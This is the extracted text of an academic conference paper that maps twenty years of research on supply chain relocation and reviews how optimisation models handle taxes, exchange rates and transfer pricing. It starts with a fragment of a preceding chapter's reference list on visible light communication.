C.-X., Haas, H., Yang, Y.: A geometry-based multiple bounce model for visible light communication channels. In: Proceedings of the 2016 International Wireless Communications and Mobile Computing Conference (IWCMC), pp. 31–37, September 2016 22. Alsalami, F.M., Ahmad, Z., Haas, O., Rajbhandari, S.: Regular-shaped geometry-based stochastic model for vehicle-to-vehicle visible light communication channel. In: Proceedings of the 2019 IEEE Jordan International Joint Conference on Electrical Engineering and Information Technology (JEEIT), pp. 297–301, April 2019 23. Kahn, J.M., Barry, J.R.: Wireless infrared communications. Proc. IEEE 85(2), 265–298 (1997) 24. Willebrand, H.: Free-space optics: enabling optical connectivity in today’s networks, p. 278 25. Fabian, M., Lewis, E., Newe, T., Lochmann, S.: Optical fibre cavity for ring-down experiments with low coupling losses. Meas. Sci. Technol. 21, 1–5 (2010) 26. Cailean, A., Dimian, M.: Impact of IEEE 802.15.7 standard on visible light communications usage in automotive applications. IEEE Commun. Mag. 55(4), 169–175 (2017)

Mapping Review of Research on Supply Chains Relocation Mouna Benfssahi1(B) , Nordine Sadki1 , Zoubir El Felsoufi1 , and Abdelhay Haddach2 1

2

Laboratory of Mathematical Modeling and Control, Faculty of Science and Techniques, Tangier, Morocco {M.benfssahi,Zelfelsoufi}@uae.ac.ma,[email protected] Materials, Environment and Sustainable Development, Faculty of Science and Techniques, Tangier, Morocco

Abstract. Supply chain relocation (SCR) and reconfiguration are emerging disciplines that allow supply chains to reduce costs and increase operations and economic performances. In this article, we provide a mapping review of literature related to Supply chain relocation, which is a part of Supply chain design. We first start with a broad sweep of the literature to build an understanding state of the supply chain relocation models, and the criteria, characteristics, and constraints are taken into consideration. We have explored the 20 years of existing models from 2001 to 2020 related to SCR, and we have summarized the models’ characteristics and factors as well as the main authors. Furthermore, we highlight the reasons for which it is necessary to include financial policies in the SCR model. This review methodology is general and can be applied to any field. It aims to help researchers to find fruitful works related to their fields.

Keywords: Supply chain relocation financial policies

1

· Mapping review · International

Introduction

A typical supply chain is a materials and information network composed of suppliers, manufacturers, logistics agencies, distribution centers(or warehouses), retailers, and consumers. It involves the whole process and entities that lead to the fabrication of a product from raw material sourcing, production of intermediate products, assembly of finished products, packaging, warehousing, and transportation to the end customer till its disposal. Supply chain management (SCM) is the management of the flow of materials, information, and funds across different enterprises and departments. It has been proved to be an effective way to enhance enterprises’ flexibility and sustainability in the current globalized market by collaborating with upstream and downstream enterprises. c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023  J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 73–92, 2023. https://doi.org/10.1007/978-3-031-35251-5_8

74

M. Benfssahi et al.

Since then, supply chain management has emerged as a science needed to create value and ensure the competitiveness of companies. From there, several notions and concepts have landed to enrich the dictionary of SCM. In the following, we present some business movement and their distinction to the concept of relocation. The management of supply chains by facility relocation, as confirmed by Melo et al. [44] is taking more importance increasingly. This new tendency is manifested by transferring a part of the supply chain to other less developed sites that produce intermediate goods. In contrast, the finished product is assembled at a site close to the final customer. From there, the concept of relocation has been raised as a new business movement related to operations that are ensured inside the group but abroad by its own subsidiaries [51]. In such a case, new flows are created to exchange goods and services between the parent company and its subsidiaries abroad. The importance of supply chain relocation models is enormous. Still, to the best of the authors knowledge, the literature fails to connect the link between relocation and the use of financial criteria, which helps improve the supply chain’s performance. Our first contribution through this article is to sort out research on supply chain relocation connected with international financial factors analysis. Our second contribution is to define some financial policies and show their impact on Supply chain performance and relocation decisions. Thirdly, our review methodology can be used in many fields to extract fruitful works. The remainder of this article is organized as follows: we start, firstly, by checking the existing definitions of relocation and other similar strategies through the literature. Secondly, we make a mapping review over 20 years of research, according to many metrics, to build an understanding state of the supply chain relocation models. Thirdly, we summarize the models’ characteristics and analyze the gaps in these models. We find that the transfer pricing criteria are seldom discussed in relocation models. We present an illustrative example to highlight the impact of transfer price policies on firms’ economic performance and the relocation decision.

2

Different Business Strategies Related To SCM

Across the literature, we can find few works like [7,29,33,55,69] that name the relocation phenomena as “delocalization” that has french origin. However, the nomination of relocation is the most common in the literature. It is used during our analysis of research databases to avoid escaping relevant works in the same field. The relocation strategy is distinguished from other business strategies as they have different characteristics and motivations. Firms not only have to decide where to locate their activities but also whether they prefer to keep their control and autonomy or delegate them to external parties. Such decisions are named outsourcing, offshoring, insourcing, reshoring, and back-shoring, which are business strategies that affect the organizational structure of a firm. Distinct definitions can be found in the literature and are summarized below in Table 1.

Mapping Review of Research on Supply Chains Relocation

75

Table 1. Comparison of different business strategies. Business phenomena

Strategy

Motivations and ownership

Relocation (Eng term) or Delocalization (Fr term) or offshoring

Internalization

-Essentially, reducing costs, Not motivated by conquering new markets, -owned subsidiary out of the country

Outsourcing

Externalization -Essentially, reducing costs, increasing competitiveness. -the transfer of ownership and control to a third party (domestic or foreign).

FDI Internalization

Internalization

-Essentially, conquering new markets -Owned by home country.

Insourcing

Internalization

-Relocation to an owned foreign company in order to take back control.

Reshoring

Internalization

-Generic change of location with respect to a previous offshore country can include further offshoring (i.e., relocation to another offshore location) or back-shoring.

Back-shoring

Internalization

-Relocation back to the firm’s home country of origin in order to enhance quality, brand sensitivity to “made in label”, and customer added value

We think that the divergences regarding the definition of relocation emerge from the adoption of divergent points of view, different motivations, and different ownership structures. Since we adopt the view of the firm and focus on supply chain aspects, it is more appropriate to define the relocation at a micro-economic level while emphasizing the elements that impact the configuration of supply chains. Outsourcing is the delegation of a part of production or services that is not competitive to an external part in order to minimize costs and get the best experience from specialized firms. The goal is to delegate secondary activities which are time and cost-consuming or that the company does not well mater. In that manner, the company will dedicate more of its resources to the leading competitive activities, which consist of the company’s core business. The company may choose to outsource in the home country (domestic outsourcing) or a foreign country (foreign outsourcing). Farok et al. 2010 [21] define outsourcing as the organizational restructuring of some activities either in the home nation of the firm or abroad to external providers. On the other hand, they consider offshoring as restructuring the firm geographically from the home nation to a foreign location where the same company activities are performed under either the company’s own subsidiary or allocated to a foreign contract vendor. [42] define offshoring as “the transfer of business processes and activities to foreign locations” while stating that

76

M. Benfssahi et al.

outsourcing “refers to services that are sourced from an external supplier within the boundaries of one country”. According to Hammami [33], relocation is defined as the total or partial transfer, by an FDI, of a productive process whose production is initially destined to the same current markets to increase the firm’s added value. Arlbjorn and Mikkelsen [3] distinguish these concepts from an ownership perspective. They link offshoring to an owned subsidiary out of the country and outsourcing to transfer ownership and control to a third party. They consider insourcing and back-shoring as relocating the production to a facility in another country owned by the company. Johansson and Olhager [38] state that ’Offshoring’ refers to the relocation of firms’ activities across the national borders of a firm, while the term ‘back-shoring’ indicates a relocation back to the firm’s home country of origin. Moreover, ‘Reshoring’, which refers to a generic change of location concerning a previous offshore country, can include further offshoring (i.e., relocation to another offshore location) or back-shoring (i.e., relocation to the home country).” FDI can be confused with relocation. However, the main difference is the mobile of relocation. In fact, FDI is searching for new markets, whereas relocation is not. It is driven most by cost reduction incentives. FDI is suitable in the case where a country has signed several international exchange conventions with other countries. The exporting company will be able to benefit from the possibility of selling its products to all the countries in agreement with the host country. For example, an exporting company installed in Morocco can go from Morocco to sell to the Gulf or America, or African countries.

3

Definition of Relocation in Literature

The relocation of Supply chains, rarely named also as delocalization (from French), is referred to as offshore in-house sourcing in the sense of relocation abroad. According to the Organisation for Economic Co-operation and Development (OECD), relocation in the strict sense is defined as production within the group to which the company belongs but abroad by its own subsidiaries [52]. According to the same reference, a relocation that takes place through subsidiaries of the same group must satisfy the following characteristics. – Total or partial closure of the company’s production units in the reporting country with a reduced workforce. – Opening subsidiaries (or production units) abroad that produce the same goods and services. Existing subsidiaries could also carry out this production. – In the reporting country, the relocated firm imports goods, and services from its own subsidiaries abroad that were previously consumed within that country, while exports could decrease as they would be partially or totally made from abroad and would be destined for the same markets as the reporting country’s exports.

Mapping Review of Research on Supply Chains Relocation

77

As described in Fig. 1, once relocated, the group will consist of a parent company and another subsidiary located abroad, both trading goods and services. The values of these exchanged goods are measured in terms of transfer pricing.

Fig. 1. Illustration of the material flow of a relocated Firm.

3.1

Existing Definitions of Relocation

We can understand intuitively that the term relocation (or less used delocalization) means the transfer of production activities from a national territory to a foreign one. Nowhere in the literature have we found a standard definition. We present, in the following Table 2, some of the most interesting definitions according to our lecture. 3.2

Types of Relocation

Horizontal Relocation. It is carried out from a developed country to another developed country, a North-North relocation. It takes place mainly in the most developed economic zones. These countries attract a very high proportion of total FDI. It is mainly carried out through company takeovers and mergers and acquisitions. The main purpose of this movement is to maintain the company’s market share while benefiting from some advantages: overcoming tariff barriers such as customs duties imposed on goods, reducing transport costs, adapting products to local consumer preferences, and improving services thanks to its proximity to the customer. Whatever the reason for the relocation, it does not imply a change in the activity of the company of origin; on the contrary, it strengthens this activity and even keeps it alive.

78

M. Benfssahi et al. Table 2. Most relevant definitions of supply chain relocation in the literature.

[28] - In its most strict sense, relocation refers to changing the location of a given production unit without affecting the destination of manufactured products. - In a second sense, relocation refers to internationally outsourcing some activities which were before achieved in the national unit. - Finally, one may define relocation as the creation of a new production unit in a foreign country even if domestic activities have not been reduced. [5]

The relocation consists of all decisions unfavorable to the location of activities and employments in the national territory.

[8]

Define relocation as the substitution of national production by a foreign Production resulting from the decision of a producer to give up production in the country of origin for manufacturing or outsourcing its products to a foreign Territory.

[52] Relocation is production within the group the company belongs to but abroad by its own subsidiaries. [33] Relocation commonly refers to transferring certain production activities from developed to developing countries, essentially to benefit from low labor costs. [21] Relocation is restructuring the firm geographically from the home nation to a foreign location where the same company activities are performed under the company’s own subsidiary. [42] Relocation is” the transfer of business processes and activities to foreign locations by keeping an internalization strategy [3]

Relocation is owned subsidiary out of the country

[38] ‘Supply chain relocation’ refers to the relocation of firms’ activities across the national borders of a firm

Vertical Relocation. “It occurs between two countries if they have sufficiently large differences in factor endowments or production costs” [48]. This operation is carried out by FDI or by recourse to international subcontracting. The relocation movement is from North to South. Unlike horizontal relocation, vertical relocation concerns the production of “pieces” of the same product. It is linked to the theory of the international decomposition of the production process (DIPP). We can therefore deduce that international specialization and countries’ comparative advantages cannot be limited to final products but that they affect the segments of production involved in producing these final products. This strategy has led to the organization of firms into network firms. Vertical relocation can also be a substitution, i.e., the relocated production replaces the production previously carried out in the countries of origin. This form of offshoring is usually accompanied by the closure of facilities in the home countries (or reduction of production volume) and the re-import of the relocated production abroad.

Mapping Review of Research on Supply Chains Relocation

4

79

Motivations Behind Relocation Across Literature

Since the early 1990s, Supply Chain Relocation (SCR) – namely, the location of firms’ activities in foreign countries irrespective of the governance mode adopted (i.e., make/captive, hybrid/collaborative, buy/outsourcing) [10,36]) – has emerged as one of the most widespread strategies implemented by Western manufacturing companies in order to maintain or to foster their competitive advantage [21]. With respect to strategic goals, relocation is mainly driven by ”cost efficiency” motivations. While this finding is certainly common to many low technologies, labor-intensive industries, its interest lies in the fact that the origin companies never relocate their very-top-end products that are expected to be more sensitive to the ”Made in” effect. For instance, Fitwell, in Italy, never offshored high-tech mountain boots, sold with its own brand name, and for which the ”made in” effect is more strongly felt by customers. In a similar vein, Roncato offshored polycarbonate hard-shell suitcases (medium to high range) but not the polypropylene hard-shell suitcases, which are more hi-tech, and top of range [1]. A list of papers dealing with motivations for manufacturing relocation and offshoring was identified through a keyword search in Elsevier’s Scopus, leading to the identification of 24 offshoring motivations (see Fig. 2). We discuss below the motivations most frequently analyzed or disputed in the scholarly literature. The most frequent relocation motivation concerns the costs and productivity of labor in the host country [30,41]. Another frequent relocation motivation is the availability of skilled labor [49]. Some authors [2,54] emphasise quality improvement for relocation in geographical areas where advanced technologies and/or high labour skills are available. [59] specify that this improvement originates from the combined effect of factors available in the host country (e.g., the availability of skilled labor, the local knowledge, the made-in effect). [47] argue that new product development is a particularly cogent offshoring motivation when the knowledge of the local needs and habits is a requisite for selling abroad. Other authors [22,40] highlight that sometimes companies offshore their manufacturing activities due to key customers’ demand to produce in their proximity, especially in business-to-business (B2B) relations, or because of counter-trade requirements [24]. Finally, we found only one motivation regarding cost efficiency in the internal environment cited by a paper focused on small and medium enterprises, i.e., economies of scale [47]. This suggests a possible lower relevance of this category of motivations for relocation decisions.

5 5.1

Literature Review: Dimensions of the Relocation Decision Model and Its Different Variables Mapping Review of Supply Chains Relocation

In this article, we do not aim to present a full state of the art of research about the relocation of supply chains but rather to make a mapping review in order to

80

M. Benfssahi et al.

Fig. 2. Different motivations, undertaken from literature, to relocate supply chains.

show how generally the strategic dimension of this topic is spreading in scientific journals. Looking at the large number and the increasing quality of articles published in this field, it is undeniable that research on supply chain relocation (SCR) is getting more and more critical, impacting the development of many fields. It is interesting to find out what the domains reached by this research, the amount of works done through the last twenty years, and by whom. To answer this question, we propose to analyze articles published between 2001 and 2020. 5.2

Mapping Strategy

It is important to identify and search for all possible sources of information that address the research question directly. For that, we have scoured the following terms: supply chain relocation, supply chain delocalization, logistics network relocation, supply chain design, Production relocation, capacities relocation, capacities allocation, nearshore, supply chain reconfiguration/re-conception, back-shoring... Furthermore, the Boolean Operators ‘OR’, ‘AND’, and ‘NOT’ were used to join synonymous terms and exclude any non-related terms to retrieve relevant records. Example searches included (‘supply chain’ AND ‘relocation’ NOT ‘offshoring’),(‘supply chain’ AND ‘relocation’ NOT ‘FDI’),(‘supply chain’ AND ‘relocation’ NOT ‘externalization’), (‘supply chain’ AND ‘relocation’ NOT ‘Management’)...The titles and abstracts containing these terms

Mapping Review of Research on Supply Chains Relocation

81

among peer-reviewed, scholarly journals indexed in the SCOPUS database were searched, which resulted in the identification of 252 titles. These titles were analyzed and sorted to keep only the relevant ones in connection with our thematic. We present below the resulting mapping of our research. 5.3

Yearly Contribution Trend and Main Authors

Our research is projected on time in order to show the contribution by year, then by author.

Fig. 3. Yearly contribution in terms of scientific articles related to SCR.

Figure 3 shows the trends in the publication of these articles over the 20 years from 2001 to 2020. Furthermore, the distribution of the articles over time. The largest number of works regarding the topic of SCR was on 2019 with 26 articles (10.3%) and decreased slowly to 23 articles on 2020 due to the COVID19 pandemic. Even with the high-level disruptions caused by the pandemic, the SRC is an ever-growing field, and more attention in the future may be given to risk management and back-shoring options too. Figure 4 shows the highest indexed articles by main authors. The most popular authors related to our topic of research (SCR) are listed by order: Van Der Vorst, JCAJ, followed by Hammami, R, Min, H; Zhang, A; Karimi, I. A, then the authors Huang, G. Q; Fandel, G, Melo, M.T.; Vila, D, and Georgiadis, MC. In the next section, articles related to these authors were reviewed and filtered according to previously described characteristics.

82

M. Benfssahi et al.

Fig. 4. Highest indexed contribution in SCR by main authors.

5.4

Subject Area and Fileds of Research

The articles’ content was examined to determine their disciplinary position and fields of study.

Fig. 5. Subject area and fields of research of SCR.

It is reasonable that Supply Chain relocation studies are mostly conducted in the field of Business, Management, and Accounting (48.1%) because this subject area aims to push the boundaries of supply chain research and practices to gain more efficiency, performance, and integration. Then we found in second place the engineering field (36.6%) followed by Decision Science Field (23.9%) (see Fig. 5).

Mapping Review of Research on Supply Chains Relocation

5.5

83

Geographical Position and Contributing Affiliations

We are interested in the distribution of research by country, affiliation, and laboratory.

Fig. 6. Geographical position of contributing countries in SCR topic.

According to Fig. 6, our selected studies on supply chain relocation were mainly carried out in 10 countries. Most studies took place in the USA (64 articles, 25%), while only 10 articles belong to Canada (3.9%). Other works are published in either Europe (42%) or Asia (12.3%). The remaining 16% of articles belong to 30 countries around the world.

Fig. 7. Main contributing affiliations regarding SCR relocation.

84

M. Benfssahi et al.

The most active contributing affiliations regarding the SCR topic are:’Wageningen University and Research Center’ of Netherlands, followed by ’The university of Hong Kong’ (Fig. 4). The third and fourth affiliations are from Singapore. The other top 10 affiliations belong either to Europe or USA. This mapping review is a powerful tool because it can help researchers in the topic of Supply Chain Relocation to find the most interesting works in their field, identify possible ways of collaboration, and drive further new research.

6

Financial Factors in SCRM

As confirmed through many types of research, the supply chain design depends on fiscal factors. Indeed, Oliveira [67] emphasized the influence of transfer pricing and tax rates on the investment decision. Also, Shunko et al. [57] used the transfer pricing in their model as a decisive element for shifting incomes to countries with low tax rates to maximize the overall profit after taxation. Furthermore, through confirmed case studies [12,13], the authors demonstrated that the decision of relocation is very sensitive to the change in transfer pricing policies (Fig. 7). In the below example, Fig. 8, we can see how multinational firms can manipulate transfer prices to determine the geographic location of their profit. In fact, we can increase the global after-tax profit (ATP) by shifting incomes to low-tax jurisdictions.

Fig. 8. An illustrative example of the relation between the Transfer Price manipulation and geographic profit shifting.

So by relocating more production capacities to low jurisdiction (site A) and increasing the value of transfer price regarding the purchased intermediate prod-

Mapping Review of Research on Supply Chains Relocation

85

ucts, incomes will be shifted from site B to site A, and the global profit of both companies will increase to 7.8 $ per unit. The primary step is to recognize the different characteristics and constraints impacting the supply chain relocation model. In fact, these characteristics were summarized by Hammami et al. [33] and were classified under four axes as mentioned in Fig. 9.

Fig. 9. Classification of the 25 characteristics of the existing supply chain design models.

According to a previous study in [14], we present in Table 3 an updated status with recent research up to 2021 regarding the completeness of the profit structure. We compare in this study the integration of the below criteria in the literature: – Taxes (T): Income tax in the host country. – Exchange rate (ER): Exchange rate factor for converting costs and prices from local currency to the standard currency. – Transfer pricing (TP): We assess the consideration of TP in existing models in the literature. – Financing and taxation incentives (FI) are offered by host governments to attract facility investments in their regions. – Relocation context (Relocation): We assess the existing models’ compatibility with the relocation context. By sorting out our selected literature, basing on Transfer pricing (TP) as decision variable or parameter of the model, we can find only seven works which are [20,23,25,31,32,39,63] . Details are shown Table 3.

86

M. Benfssahi et al.

Table 3. Chronological classification of existing supply chain design models in the literature according to the selected financial factors Reference

T ER FI TP Relocation Year

Cohen [20]

x x

Cohen and Lee [19]

x x

1989

Arntzen [4]

x x

1995

Huchzermeier [35]

x x

Min Hocker [46]

x x

Canel [16]

x

Vidal [63]

x x

x

x

x

x x

x

2001

1997

x x

x x

x

Melo [45]

2001 2001

x x

Yan [66] Fandel [23]

1996

x

Verter [62] Goetschalckx [26]

x

x x

1989

1996

Jayraman [37] Canel et al. [17]

x

2002 2002

x

2003

x

2004

x

2005

Avittathur [9]

x

x

2005

Chakravarty [18]

x

x

2005

Wilhelm [65]

x

Vila [64]

x x

Goh Mark et al. [27]

x

x

2007

Shunko [58]

x

x

2007

Beckman [11]

x

Karimi et al.[50]

x x

x x

Hammami. R [32]

x x

Perron [53]

x

x

Georgiadis [25]

x x

x

Zambujal [67]

x

x

Zhang [68]

x

x

x

2008

x

2009

x

2009 2010

x

Hammamiand Frein [31] x x

x

Liu [43]

x x x

2011 x

x

x

2011 2011

x x x

Shunko [57]

M.K. Boujelben [39]

2006

2008

Van Der Vorst [61]

Huang [34]

2005 x

2013 2014

x

2014 2017

x

2018

Asefi et al. [6]

x

2019

Sundarakani [60]

x

2020

Mapping Review of Research on Supply Chains Relocation

87

The first pioneer paper that has introduced local content in the decision model was in 1989 by Cohen et al. [20] and its MILP (Mixed linear programming) model covers 40% of the 25 characteristics described in Fig. 9. But this model presents some limits to its application in the current industrial context due to the fact that it is built according to a productive approach. Nevertheless, in the meantime, a process approach presents more flexibility in defining activities and is more pertinent for the conception of the supply chain. This was followed by Vidal and Goetschalckx’s works in 2001 [63], in which the authors solve a deterministic model using MILP. The objective function is the maximization of the global profit after tax deduction. But it is too far to be a global model as it takes into consideration only four decision variables: Facility location, intermediate products, TP, and transport cost allocation. Besides, the third work was by Fandel and Stammen, 2004 [23]. The authors ignored the transfer of capacities and introduced the TP as a parameter in their deterministic model (MILP), not as a decisive variable. According to Table 3, all these works do not cover the majority of financial characteristics. It was only on 2009 when Hammami et al. [32] have established a more global model for supply chain design where the objective function is profit maximization. In this new model, the TP is a decisive variable. By covering 60, % of the characteristics, the model of Georgiadis et al. [25] aims to optimize the supply chain during general strategic operations without considering the particular aspects and objectives of the supply chain relocation. Hammami and Frein, 2014 [31], have used the same model but under two different methodologies for transfer pricing. Their objective was to measure the impact of the adopted TP methodology on the decision to relocate. It is a very interesting work in the measure that it is highlighting the interaction between the geographical allocation of subsidiaries and transfer pricing, yet the TP methodologies are subject to many factors that the BEPS project has recently introduced in 2015 [15,56]. This justifies our review to emphasize the necessity to add new constraints and revise the global model by integrating other elements related to transfer price. The last work belongs to M. Boujelben in 2018 [39]. It is an MILP for modeling Distribution centers locations taking into consideration international financial parameters such as TP, ER, and Tax. However, it is not a general model since it focuses only on 40% of the characteristics described in Fig. 9. All the seven selected models above are deterministic based on MILP programming. Except for the work of Hammami [31] the other models have not developed formulation of transfer price as constraints while optimizing their objective function.

7

Conclusion

We conducted an innovative way to overview literature based on a good understanding of the different concepts related to Supply chain relocation. In fact, we have been able to find fruitful research and analyze the various dimensions and

88

M. Benfssahi et al.

parameters of SCR models. Among these dimensions, we have shown the importance of transfer pricing as a decision variable in selecting potential affiliates and geographical relocation of profit. It will be helpful to drive research regarding establishing an optimization model that takes into account all operational and financial characteristics and new constraints added by the BEPS project to analyze the sensitivity of the relocation decision toward the change of the transfer pricing strategy. Finally, we can draw further conclusions useful for government and multinational firms. Our presented mapping review approach can be generalized and help researchers find fruitful works related to their fields. Furthermore, by comparing these works according to some metrics, one can find the gap in previous works of literature and may be able to conceive new problems for study.

References 1. Ancarani, A., Di Mauro, C.: Reshoring and industry 4.0: how often do they go together? IEEE Eng. Manage. Rev. 46(2), 87–96 (2018) 2. Arlbjørn, J.S., L¨ uthje, T.: Global operations and their interaction with supply chain performance. Ind. Manage. Data Syst. 112, 1044–1064 (2012) 3. Arlbjørn, J.S., Mikkelsen, O.S.: Backshoring manufacturing: notes on an important but under-researched theme. J. Purchasing Supply Manage. 20(1), 60–62 (2014) 4. Arntzen, B.C., Brown, G.G., Harrison, T.P., Trafton, L.L.: Global supply chain management at digital equipment corporation. Interfaces 25(1), 69–93 (1995) 5. Arthuis, J.: La globalisation de l’´economie et les d´elocalisations d’activit´e et d’emplois. Rapport au S´enat (145) (2005) 6. Asefi, H., Lim, S., Maghrebi, M., Shahparvari, S.: Mathematical modelling and heuristic approaches to the location-routing problem of a cost-effective integrated solid waste management. Ann. Oper. Res. 273(1), 75–110 (2019) 7. Assabane, I., et al.: Study on the impact of smart and innovative delocalization practices on international trade. Turk. J. Comput. Math. Educ. (TURCOMAT) 12(5), 958–963 (2021) 8. Aubert, P., Sillard, P.: D´elocalisations et r´eductions d’effectifs dans l’industrie fran¸caise (2005) 9. Avittathur, B., Shah, J., Gupta, O.K.: Distribution centre location modelling for differential sales tax structure. Eur. J. Oper. Res. 162(1), 191–205 (2005) 10. Bals, L., Jensen, P.D.Ø., Larsen, M.M., Pedersen, T.: Exploring layers of complexity in offshoring research and practice. In: The offshoring challenge, pp. 1–18. Springer (2013). https://doi.org/10.1007/978-1-4471-4908-8 1 11. Beckman, S.L., Rosenfield, D.B.: Operations Strategy: Competing in the 21st Century. McGraw-Hill, New York (2008) 12. Benfssahi, M., El Felsoufi, Z., Haddach, A.: Modeling financial criteria for decisions of delocalization: case study and managerial insights. In: Proceedings of the International Conference on Industrial Engineering and Operations Management Paris, France, July, pp. 26–27 (2016) 13. Benfssahi, M., El Felsoufi, Z., Haddach, A., Elayachi, B.: Analytical study of transfer of manufacturing capacities basing on financial criteria. In: International Colloquium on Logistics and Supply Chain Management, pp. 38–43. IEEE (2018)

Mapping Review of Research on Supply Chains Relocation

89

14. Benfssahi, M., Elfelsoufi, Z.: Modeling of supply chains delocalization problems taking into account the new financial policies: case of multinational firms established in OECD member countries. Int. J. Soc. Behav. Educ. Econ. Bus. Ind. Eng. 10(11), 3780–3786 (2016) 15. Bulletins d’Actualit´es Osler: Rapports finaux 2015 du Projet BEPS - R´eforme de la fiscalit´e internationale. Technical report, OSLER (2015). https://www.osler.com/ fr/ressources/reglements/2015/rapports-finaux-2015-du-projet-beps-reforme-de-l 16. Canel, C., Khumawala, B.M.: Multi-period international facilities location: an algorithm and application. Int. J. Prod. Res. 35, 1891–1910 (1997) 17. Canel, C., Khumawala, B.M.: International facilities location: a heuristic procedure for the dynamic uncapacitated problem. Int. J. Prod. Res. 39(17), 3975–4000 (2001) 18. Chakravarty, A.K.: Global plant capacity and product allocation with pricing decisions. Eur. J. Oper. Res. 165(1), 157–181 (2005) 19. Cohen, M.A., Lee, H.L.: Resource deployment analysis of global manufacturing and distribution networks. J. Manuf. Oper. Manage. 2(2), 81–104 (1989) 20. Cohen, M.A., Fisher, M., Jaikumar, R.: International manufacturing and distribution networks: a normative model framework. Managing Int. Manuf. 13, 67–93 (1989) 21. Contractor, F.J., Kumar, V., Kundu, S.K., Pedersen, T.: Reconceptualizing the firm in a world of outsourcing and offshoring: the organizational and geographical relocation of high-value company functions. J. Manage. Stud. 47(8), 1417–1433 (2010). https://doi.org/10.1111/j.1467-6486.2010.00945.x, https://onlinelibrary. wiley.com/doi/10.1111/j.1467-6486.2010.00945.x 22. Ellram, L.M.: Offshoring, reshoring and the manufacturing location decision. J. Supply Chain Manage. 49(2), 3 (2013) 23. Fandel, G., Stammen, M.: A general model for extended strategic supply chain management with emphasis on product life cycles including development and recycling. Int. J. Prod. Econ. 89, 293–308 (2004) 24. Fratocchi, L., Di Mauro, C., Barbieri, P., Nassimbeni, G., Zanoni, A.: When manufacturing moves back: concepts and questions. J. Purchasing Supply Manage. 20(1), 54–59 (2014) 25. Georgiadis, M.C., Tsiakis, P., Longinidis, P., Sofioglou, M.K.: Optimal design of supply chain networks under uncertain transient demand variations. Omega 39(3), 254–272 (2011) 26. Goetschalckx, M., Vidal, C.J., Dogan, K.: Modeling and design of global logistics systems: a review of integrated strategic and tactical models and design algorithms. Eur. J. Oper. Res. 143(1), 1–18 (2002) 27. Goh, M., Lim, J.Y., Meng, F.: A stochastic model for risk management in global supply chain networks. Eur. J. Oper. Res. 182(1), 164–173 (2007) 28. Grignon, F.: Rapport d’information sur la d´elocalisation des industries de maind’œuvre. Commission des affaires ´economiques et du Plan 374 (2004) 29. Guzik, R., Micek, G.: The impact of delocalization on the European software industry. In: The Moving Frontier, pp. 229–253. Routledge (2019) 30. Gylling, M., Heikkil¨ a, J., Jussila, K., Saarinen, M.: Making decisions on offshore outsourcing and backshoring: a case study in the bicycle industry. Int. J. Prod. Econ. 162, 92–100 (2015) 31. Hammami, R., Frein, Y.: Redesign of global supply chains with integration of transfer pricing: mathematical modeling and managerial insights. Int. J. Prod. Econ. 158, 267–277 (2014). https://doi.org/10.1016/j.ijpe.2014.08.005

90

M. Benfssahi et al.

32. Hammami, R., Frein, Y., Hadj-Alouane, A.B.: A strategic-tactical model for the supply chain design in the delocalization context: mathematical formulation and a case study. Int. J. Prod. Econ. 122(1), 351–365 (2009). https://doi.org/10.1016/j. ijpe.2009.06.030, www.sciencedirect.com/science/article/pii/S0925527309001996 33. Hammami, R., Frein, Y., Hadj-Alouane, A.B.: Supply chain design in the delocalization context: relevant features and new modeling tendencies. Int. J. Prod. Econ. 113(2), 641–656 (2008) 34. Huang, Y., Huang, G.Q., Newman, S.T.: Coordinating pricing and inventory decisions in a multi-level supply chain: a game-theoretic approach. Transp. Res. Part E Logistics Transp. Rev. 47(2), 115–129 (2011) 35. Huchzermeier, A., Cohen, M.A.: Valuing operational flexibility under exchange rate risk. Oper. Res. 44(1), 100–113 (1996) 36. Jahns, C., Hartmann, E., Bals, L.: Offshoring: dimensions and diffusion of a new business concept. J. Purchasing Supply Manage. 12(4), 218–231 (2006) 37. Jayaraman, V., Pirkul, H.: Planning and coordination of production and distribution facilities for multiple commodities. Eur. J. Oper. Res. 133(2), 394–408 (2001) 38. Johansson, M., Olhager, J.: Comparing offshoring and backshoring: the role of manufacturing site location factors and their impact on post-relocation performance. Int. J. Prod. Econ. 205, 37–46 (2018) 39. Kchaou Boujelben, M., Boulaksil, Y.: Modeling international facility location under uncertainty: a review, analysis, and insights. IISE Trans. 50(6), 535–551 (2018) 40. Kinkel, S.: Trends in production relocation and backshoring activities: changing patterns in the course of the global economic crisis. Int. J. Oper. Prod. Manage. (2012) 41. Kinkel, S., Maloca, S.: Drivers and antecedents of manufacturing offshoring and backshoring-a German perspective. J. Purchasing Supply Manage. 15(3), 154–165 (2009) 42. Lewin, A.Y., Volberda, H.W.: Co-evolution of global sourcing: the need to understand the underlying mechanisms of firm-decisions to offshore. Int. Bus. Rev. 20(3), 241–251 (2011). https://doi.org/10.1016/j.ibusrev.2011.02. 008, https://www.sciencedirect.com/science/article/pii/S0969593111000321. Coevolutionary Research on Global Sourcing: Implications for Globalization, International Strategies, and Organizational Designs 43. Liu, S., Papageorgiou, L.G.: Fair profit distribution in multi-echelon supply chains via transfer prices. Omega 80, 77–94 (2018) 44. Melo, M.T., Nickel, S., Saldanha-da Gama, F.: Facility location and supply chain management - a review. Eur. J. Oper. Res. 196(2), 401–412 (2009). https://doi. org/10.1016/j.ejor.2008.05.007 45. Melo, M.T., Nickel, S., Da Gama, F.S.: Dynamic multi-commodity capacitated facility location: a mathematical modeling framework for strategic supply chain planning. Comput. Oper. Res. 33(1), 181–208 (2006) 46. Min, H., Melachrinoudis, E.: Dynamic location and entry mode selection of multinational manufacturing facilities under uncertainty: a chance-constrained goal programming approach. Int. Trans. Oper. Res. 3(1), 65–76 (1996) 47. Mohiuddin, M., Su, Z.: Manufacturing small and medium size enterprises offshore outsourcing and competitive advantage: an exploratory study on Canadian offshoring manufacturing SMEs. J. Appl. Bus. Res. (JABR) 29(4), 1111–1130 (2013) 48. Mouhoud, E.M.: Th´eories et r´ealit´es des d´elocalisations dans l’industrie et les services. Post-print, HAL (2013). https://EconPapers.repec.org/RePEc:hal:journl: hal-01489230

Mapping Review of Research on Supply Chains Relocation

91

